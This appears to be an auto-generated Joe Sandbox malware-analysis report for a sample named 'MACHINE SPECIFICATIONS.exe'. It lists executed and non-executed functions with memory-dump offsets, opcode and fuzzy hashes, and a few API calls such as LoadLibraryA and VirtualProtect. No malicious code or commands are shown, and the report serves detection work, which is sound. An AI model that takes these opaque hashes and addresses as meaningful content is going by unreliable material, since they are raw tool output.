Function 00F7D6A8 Relevance: .4, Instructions: 408
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84d0f128d753c9a7a9dc3d4dca2ed90e9c60bbaff1842b1f53662ee6e54763de
Instruction ID: 276dd2386c24ac95f32837bbe83c4536b894ee520b7c9edfc4f8e832ae13be8e
Opcode Fuzzy Hash: 84d0f128d753c9a7a9dc3d4dca2ed90e9c60bbaff1842b1f53662ee6e54763de
Instruction Fuzzy Hash: 1FF1F431A042168FC705CF69C8809AEBBF2FFC9300B59C5AAD549EB265D734AD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F7959B Relevance: .3, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85627f153923bc8c1a08ad9ffe81e9c49629532eea888fa98ae0285a3f7ab512
Instruction ID: 76c48d580a16f37147b9abd9397280a1f6a5e979b38c3dad7239da9fa89f487e
Opcode Fuzzy Hash: 85627f153923bc8c1a08ad9ffe81e9c49629532eea888fa98ae0285a3f7ab512
Instruction Fuzzy Hash: C9D14C35A00219CFCB05CF64D4849ADFBB2FF48314B5AC655E819AB361DB75ED86CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F795A8 Relevance: .3, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b6731b60851adc14effb01373c0bc4e72a23d16ff46e74ff07061f13928a98
Instruction ID: 954ca60978637ca200937019ff85d8c981834242f8c4377cf085e0c61e22e42a
Opcode Fuzzy Hash: 21b6731b60851adc14effb01373c0bc4e72a23d16ff46e74ff07061f13928a98
Instruction Fuzzy Hash: 44B15B35E0021ACFCB05CF65D4849ADFBB2FF48314B5AC656E819AB361D771E886CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F70BDC Relevance: 1.6, APIs: 1, Instructions: 103
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 00F70CD7

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a5697506d3723ca2f13fa2ca3dec6f1f988f2085a1cb89041ae960e94212ce73
Instruction ID: 80d9d565225f0d3f9e2f63d558ed9ab7f15e40fd0e12e05ea9fe0bde7a46881c
Opcode Fuzzy Hash: a5697506d3723ca2f13fa2ca3dec6f1f988f2085a1cb89041ae960e94212ce73
Instruction Fuzzy Hash: BE414970D00258DFDB10CFA9C99579DBBF1AF48314F14852AD819A7381DB749846CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00F70158 Relevance: 1.6, APIs: 1, Instructions: 99
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 00F70CD7

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fca24382d3918fcda7925fa9f6faa809febcfcd643beec3352dccdc0c75c71ac
Instruction ID: e62ab4e8cb3abb647b52123295c657da00da631ad1adf958c44344beffdcb6cb
Opcode Fuzzy Hash: fca24382d3918fcda7925fa9f6faa809febcfcd643beec3352dccdc0c75c71ac
Instruction Fuzzy Hash: DA414970D00658CFDB10CFA9C98579EBBF1AF48314F10852AE819A7381DB74A845DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F70F50 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F70FC4

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e93e16b954064988841f2eebe07bc46b82b999e621a9c7f2e40d9a963c5cd568
Instruction ID: 1a4b7b2229022ed86d6e3c261cb7ffaa6ea120f032e9d007e23c89126aacd5b7
Opcode Fuzzy Hash: e93e16b954064988841f2eebe07bc46b82b999e621a9c7f2e40d9a963c5cd568
Instruction Fuzzy Hash: E711F771D042499BCB10DFAAC444AEFFBF5FF48324F14842AD519A7240DB749944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027E09A0 Relevance: .3, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d70d1b20e1575244d64a906af935f35dbef66c328ac37b95fa23e8a0f3ee95
Instruction ID: 292ad412ccbf625de272e23848660af8ae30daa5e7c9cacd91fad2cd4ed08653
Opcode Fuzzy Hash: 09d70d1b20e1575244d64a906af935f35dbef66c328ac37b95fa23e8a0f3ee95
Instruction Fuzzy Hash: 39C14A75E00119AFCF21DFA4C980D9DBBB6FF0D304B208096D61AAB265DB32E955DF90

Uniqueness

Uniqueness Score: -1.00%

Function 027E0980 Relevance: .3, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea83477f2f308597e48a0e95b966744a52d9abbf1198eb1839aa1544fbe604a
Instruction ID: e1f10971019d30163f9a407d97d9d5d69bb139273bebcbc0bd3d02abc1602df9
Opcode Fuzzy Hash: 7ea83477f2f308597e48a0e95b966744a52d9abbf1198eb1839aa1544fbe604a
Instruction Fuzzy Hash: 3EC14875E00119AFCF21DFA4C980D9DBBB6FF0D304F208096D61AAB265DB32A955DF90

Uniqueness

Uniqueness Score: -1.00%

Function 027E1200 Relevance: .2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd94bfb10f23e9e9e6d2d22b8e2b316e77a99faacf5e4d6c38118b5e2d5f64c
Instruction ID: 7b268a4f71efff2f5f42d4ef5d0f846c495d43f41a3c6533c85a5690b62b2a92
Opcode Fuzzy Hash: 9cd94bfb10f23e9e9e6d2d22b8e2b316e77a99faacf5e4d6c38118b5e2d5f64c
Instruction Fuzzy Hash: 15717D35E00119DFCB11DFA4D880D9DBBB6FF4A304B218096E61AAB364DB31EC16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 027E11E0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5893f454beaea034a78b33a62d9fb67d0514aded7de1f51428396f90886ee384
Instruction ID: 24d74de4ea224354e89b538e093665867a394c3ec164e42f14127002a4db1e5e
Opcode Fuzzy Hash: 5893f454beaea034a78b33a62d9fb67d0514aded7de1f51428396f90886ee384
Instruction Fuzzy Hash: A0716A75E01119DFCB00DFA4D880D9DBBB6FF4A304B2180A6E51AAB364DB31ED16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 027E00C0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446f38116bf1d041a33aceeb34903f47b26bcf424fb7f82b42db675fd4337a6c
Instruction ID: 3f396990838689977d56074b568a5f7325edcb2c359d629939b354e1d12aeab3
Opcode Fuzzy Hash: 446f38116bf1d041a33aceeb34903f47b26bcf424fb7f82b42db675fd4337a6c
Instruction Fuzzy Hash: A8511C3550D3859FCB12CB64DC9489ABFB1EF4B210B0980D7D555EB2A2D7359C0ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 027E03A8 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2184ab9206bcc3c55dc7ce2f162eb05a6f8aeb772b68aefde0a24c3aa5e72f9d
Instruction ID: 488c4f2c61e73c07fd54ce15ddcc3b1ae339c588c3844486f739c3c3ca80a312
Opcode Fuzzy Hash: 2184ab9206bcc3c55dc7ce2f162eb05a6f8aeb772b68aefde0a24c3aa5e72f9d
Instruction Fuzzy Hash: 48519D35E00169AFCF10DFA4D880DADBBB6FF49204B148066E516AB260DB31ED15CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027E038C Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c690da567552d31a29b94d302de03509118dbe95c6d904c046fd49a35867f7
Instruction ID: 48b0d7492dec94ac7593400596ec3924b9f93e398b9d5ce6c4dac1c482454a2e
Opcode Fuzzy Hash: 43c690da567552d31a29b94d302de03509118dbe95c6d904c046fd49a35867f7
Instruction Fuzzy Hash: 1D517935E00519AFCF00DFA4D884DADBBB6FF49204B1480A6E916AB261DB31ED15CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027E0190 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70352833bcffbfff5926a393a46f644a4ceeee7e58ea07f7d9badcef4131d3c
Instruction ID: 3ef5d3766b90179d51f492a3d4c02062ad416037a405109ed1d86a49b11cf778
Opcode Fuzzy Hash: c70352833bcffbfff5926a393a46f644a4ceeee7e58ea07f7d9badcef4131d3c
Instruction Fuzzy Hash: AF410139904215DFCB11CF64D858DAEBFF5FF4A300B0581AAE51AEB361C735A906CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 027E00A7 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277713389.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fac14a9de092653dc0681153979c52c37bd0a97a9b09b35af1675356a0e0622
Instruction ID: b558e83b9d6830f20c9d3cfbf2fc583dd7254b9ec546fb0a34a290867fc07df7
Opcode Fuzzy Hash: 2fac14a9de092653dc0681153979c52c37bd0a97a9b09b35af1675356a0e0622
Instruction Fuzzy Hash: 8CC08055008A420ADB10F72CFC075C7F730BBC8A54384C589D0882F12ED174448751D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F7F4B8 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff86e41a108d2192ee523ba5693e5c261ab5004a31b9e18f1fc2ea58f871914
Instruction ID: d46f7bcb89656a543f2c2341d1f5390aff3afab5e374332e43b7b4517a49ca92
Opcode Fuzzy Hash: 4ff86e41a108d2192ee523ba5693e5c261ab5004a31b9e18f1fc2ea58f871914
Instruction Fuzzy Hash: 15D18632E1065ACBCB11CF64C9011EEF3F2AF8E700B368566D5457B150EB71AE89DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F7E140 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3d3e202ad38e5eed326c151e4e118b50957332d9f27864cdb4a35fe91b7493
Instruction ID: 7338ff99f900356a9c7dec08940559ada8d0995baf2eb1d5c7bb48b3b1482f4e
Opcode Fuzzy Hash: cb3d3e202ad38e5eed326c151e4e118b50957332d9f27864cdb4a35fe91b7493
Instruction Fuzzy Hash: 9DB1C135604216CFCB05CF69C4408AABBF2FF89300B49C4AAE8499F266D735E955DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F7DB49 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b120b4c7a7404a303e87337d5ab99938f2f7231f30cd5db70001cf477dfd8f70
Instruction ID: e875daaa02eac1243f5fe270dc348adf7722369d5d659a3de8f5344c4fe35b84
Opcode Fuzzy Hash: b120b4c7a7404a303e87337d5ab99938f2f7231f30cd5db70001cf477dfd8f70
Instruction Fuzzy Hash: F5212422B582E34AF7168EBB9D513673BF2AFC1360F4DC4776C58CA141DB69C801E255

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MACHINE SPECIFICATIONS.exePID: 492, Parent PID: 5616COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 05107100 Relevance: .6, Instructions: 609COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367841151.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5100000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4552c3cc684fc8ea0dd045c6c8d00ebeca2c4065b9874f7991a2b03d978bcf28
Instruction ID: 07cecac0e1e6610071bb6f06a5babd2f269699fb2a672df3ff909e6fac70dea5
Opcode Fuzzy Hash: 4552c3cc684fc8ea0dd045c6c8d00ebeca2c4065b9874f7991a2b03d978bcf28
Instruction Fuzzy Hash: 2C22DE357002405FDB24AB34946A73E7AE3EBCA244F159839E906DB3D5EF74EC4A8781

Uniqueness

Uniqueness Score: -1.00%

Function 0510BE80 Relevance: .6, Instructions: 602COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367841151.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5100000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432fc8700b5b382a4b6eecc73b5bcedb77a7dcbc161ca32f9003ca706e1151de
Instruction ID: 579cb097f64685436fdf903e91b10d97201de46353b8bc036bb309ea6d4adec9
Opcode Fuzzy Hash: 432fc8700b5b382a4b6eecc73b5bcedb77a7dcbc161ca32f9003ca706e1151de
Instruction Fuzzy Hash: C822DC347002449FCB15EB35C859A2EBBE2EFC6204F158569E806DB396DF74EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05101D98 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367841151.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5100000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9515558ce7fbde22a8a7a119afa2e001a8fdc6aa16e520281e7409b499d1e1
Instruction ID: ebe80aedd2b6b14d725af52cee2c7d3191bacd070790a31073cd98083b1fde98
Opcode Fuzzy Hash: 1f9515558ce7fbde22a8a7a119afa2e001a8fdc6aa16e520281e7409b499d1e1
Instruction Fuzzy Hash: 93D14934B002059FCB18DF69D99496EB7F3FF88304B558468E806AB791DB74EC86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05EF1538 Relevance: 18.9, Strings: 14, Instructions: 1411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y, xrefs: 05EF26EF
T], xrefs: 05EF1618
Z, xrefs: 05EF1CC9
<], xrefs: 05EF195E
pZ, xrefs: 05EF243F
(Z, xrefs: 05EF1E59
|\, xrefs: 05EF16BA
4\, xrefs: 05EF1792
d\, xrefs: 05EF175C
XZ, xrefs: 05EF1D8B
$], xrefs: 05EF1726
@Z, xrefs: 05EF236B
L\, xrefs: 05EF16F0
l], xrefs: 05EF18E0

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: $]$(Z$4\$<]$@Z$L\$T]$XZ$d\$l]$pZ$|\$Y$Z
API String ID: 0-3668584775
Opcode ID: 300dfeb0c517f2383122acc8cf159a0574537b3717043cfe48b8788a2daac367
Instruction ID: 6dbca21cf907a327a8e28e02ec75b20c56ba5ebf6b6ddb44a67d8894862ad3ed
Opcode Fuzzy Hash: 300dfeb0c517f2383122acc8cf159a0574537b3717043cfe48b8788a2daac367
Instruction Fuzzy Hash: D8C26C75B006189FDB14CF64C881EADB7B2FF88704F5180A9E64AAB3A4DB31AD41DF51

Uniqueness

Uniqueness Score: -1.00%

Function 05EF151C Relevance: 10.3, Strings: 8, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|\, xrefs: 05EF16BA
T], xrefs: 05EF1618
4\, xrefs: 05EF1792
d\, xrefs: 05EF175C
$], xrefs: 05EF1726
<], xrefs: 05EF195E
L\, xrefs: 05EF16F0
l], xrefs: 05EF18E0

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: $]$4\$<]$L\$T]$d\$l]$|\
API String ID: 0-3887339468
Opcode ID: 5f18937384f68db2274980dd7b8db7df93deac15c86fc1ea611a93d0740ec05c
Instruction ID: 7b71c18fa0a41b0f5269b9dfa14c8ad56883b2e7e7a1d2f1b405d8841c3c7181
Opcode Fuzzy Hash: 5f18937384f68db2274980dd7b8db7df93deac15c86fc1ea611a93d0740ec05c
Instruction Fuzzy Hash: F9C14635B10608EFCB04CF94D894EAEB7B2FF89714B919065EA05AF765CA71EC40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05EF0048 Relevance: 5.7, Strings: 4, Instructions: 663
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|`, xrefs: 05EF0202
la, xrefs: 05EF0122
Ta, xrefs: 05EF0448
<a, xrefs: 05EF02ED

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: <a$Ta$la$|`
API String ID: 0-1237728259
Opcode ID: 35ad71c2fae2517311135259aee5a2201028a857ceca1a95f8e2917d578a013b
Instruction ID: 5f9f6d8836763902610cd208d1e2b1b4893a67250460ecdf419b62076e7420be
Opcode Fuzzy Hash: 35ad71c2fae2517311135259aee5a2201028a857ceca1a95f8e2917d578a013b
Instruction Fuzzy Hash: AB4279313046288FCB20AF74C05556EB7E2BF86708B02591CD68BAF794DF75ED498B86

Uniqueness

Uniqueness Score: -1.00%

Function 05EF0000 Relevance: 5.3, Strings: 4, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|`, xrefs: 05EF0202
la, xrefs: 05EF0122
Ta, xrefs: 05EF0448
<a, xrefs: 05EF02ED

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: <a$Ta$la$|`
API String ID: 0-1237728259
Opcode ID: 263f4fe3d8b735bcc63cda1eb5073ff23ee2c43431351f5b89b8259b9a474999
Instruction ID: 31a0cfa1d10cf2ab9042bd2f00d91a751eb72dfad7b8b5c5f70292ddec40de6b
Opcode Fuzzy Hash: 263f4fe3d8b735bcc63cda1eb5073ff23ee2c43431351f5b89b8259b9a474999
Instruction Fuzzy Hash: 9DD1CE34704248DFEB008FA4C855BAE7BB2AF96308F055056E6469F3A6DF71DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012E08E8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNEL32 ref: 012E0947

Memory Dump Source

Source File: 00000003.00000002.364104735.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12e0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 6af2821dac14c222da519078d9e76a5ea6446b216c34877670619a493c0f0f6e
Instruction ID: 2837a6251a31be005efaf2d0dde5932447b2bbf9932262f8d954569cc6f356f5
Opcode Fuzzy Hash: 6af2821dac14c222da519078d9e76a5ea6446b216c34877670619a493c0f0f6e
Instruction Fuzzy Hash: B6113371D003498FDB20DFAAC8487EFBBF4AB48224F14881AC519B7240DB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EF4145 Relevance: 1.3, Instructions: 1278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b66867610159200db04f576872d8f9abe0eb5c91da2e25d64bb15d6be79a2ec5
Instruction ID: 139582356360f42cb1570ce2ed5bbe55afa1158c05a3ff5c3d7e447597170902
Opcode Fuzzy Hash: b66867610159200db04f576872d8f9abe0eb5c91da2e25d64bb15d6be79a2ec5
Instruction Fuzzy Hash: 93A1D770B042089FDF04DB78C850A6FBBF2EF89204B15906AE656AB3A5DF34EC019B51

Uniqueness

Uniqueness Score: -1.00%

Function 051067DD Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367841151.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5100000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f8afc1fa5a2f5d2214c6e4006a041616975332eab391fe6133415a024a516e
Instruction ID: d23992ecca4725fcd7280da1a07f1d06e97e8aa4896ede8801c65df8ac2ce674
Opcode Fuzzy Hash: 69f8afc1fa5a2f5d2214c6e4006a041616975332eab391fe6133415a024a516e
Instruction Fuzzy Hash: CA42C230B042159BCF19EBB4D8A56BE7BB3BF89204F254429E506E7395DFB4DC428B81

Uniqueness

Uniqueness Score: -1.00%

Function 05EF2A68 Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a2f5999c7ad9bfdd7372332ad2f46f0e8b25369accb9687da5a721a2ba03e9
Instruction ID: fa9ce6a75137f6c38402cdfa56d67b075c81162b7f5e9a1439886b292f854bca
Opcode Fuzzy Hash: 55a2f5999c7ad9bfdd7372332ad2f46f0e8b25369accb9687da5a721a2ba03e9
Instruction Fuzzy Hash: 7A221875B001189FDB04CFA9D884EAEBBF6EF88704B158099E606EB365DB71EC41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0510CDD3 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367841151.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5100000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0095225cca7704df96a8b68d4f867e1c5c13a6180923ad25680ed8f10b1ad92
Instruction ID: 21c9b71769724a9fb472a99d1f2c21a376553584e49f55af5c56bf38a73fff3d
Opcode Fuzzy Hash: e0095225cca7704df96a8b68d4f867e1c5c13a6180923ad25680ed8f10b1ad92
Instruction Fuzzy Hash: 12E13D34A00205CFDB14DFA4D499AADBBF2FF45304F519968E50AAB3A5CB75AC86CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0510F150 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367841151.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5100000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f01a496c5a43561c1ffe421ef234822d813c09e6a757413336f37988fdd29b
Instruction ID: 1cedffa99a5674072ee8307377a7a0e717b3af98dec73a35d220ed73f4ef64b9
Opcode Fuzzy Hash: d9f01a496c5a43561c1ffe421ef234822d813c09e6a757413336f37988fdd29b
Instruction Fuzzy Hash: 7BA1B235B081118FCB79DB69D496A6DB7E2FF85220B169069E805DF391CBB5EC42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05EF3DE0 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.368398725.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5ef0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03dfcc7813de62b82009c61d87eca8baf0d49b26c3119e8bfc93f9399e22254
